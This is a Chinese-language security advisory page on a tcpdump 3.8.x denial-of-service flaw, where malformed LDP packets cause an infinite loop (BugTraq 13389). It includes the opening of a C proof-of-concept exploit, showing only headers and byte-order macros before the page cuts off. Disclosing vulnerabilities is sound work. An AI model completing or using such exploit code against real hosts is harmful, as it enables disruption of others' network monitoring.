当前位置：首页 » 服务器技术

开发技术指南» 文章正文

    引言： 信息提供：安全公告（或线索）提供热线：51cto.editor@

 

 

Tcpdump LDP解码例程拒绝服务漏洞

【程序编程相关:SimpleBlog脚本插入和SQL注入】

【推荐阅读:Cisco SSH超大数据包远程拒绝服务】

信息提供: 【扩展信息:RedKernel Referrer T】

安全公告（或线索）提供热线:51cto.editor@gmail.com

漏洞类别:

设计错误

攻击类型:

拒绝服务攻击

发布日期:

2005-04-27

更新日期:

2005-04-27

受影响系统:

lbl tcpdump 3.8.x

安全系统:

无

漏洞报告人:

vade 79 （v9@fakehalo.deadpig.org）

漏洞描述:

bugtraq  id: 13389

tcpdump是一款免费的网络分析程序,适用于多种unix操作系统.

tcpdump对ldp协议的解码存在漏洞,远程攻击者可能利用此漏洞对进行造成拒绝服务攻击.

起因是tcpdump解码label distribution protocol (ldp)数据报的方式存在漏洞.远程攻击者可以通过发送畸形的ldp报文导致软件陷入死循环.

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用.使用者风险自负！

#include <stdio.h>

#include <stdlib.h>

#include <unistd.h>

#include <string.h>

#include <signal.h>

#include <time.h>

#include <sys/socket.h>

#include <sys/types.h>

#include <netinet/in.h>

#include <netdb.h>

#ifdef _use_arpa

#include <arpa/inet.h>

#endif

/* doesn't seem to be standardized, so... */

#if defined(__byte_order) && !defined(byte_order)

#define byte_order __byte_order

#endif

#if defined(__big_endian) && !defined(big_endian)

#define big_endian __big_endian

#endif

#if defined(byte_order) && defined(big_endian)

#if byte_order == big_endian

#define _use_big_endian

#endif

#endif

...   下一页

» 本期热门文章：

· 热门栏目：

» 相关精选文章

» 其它相关：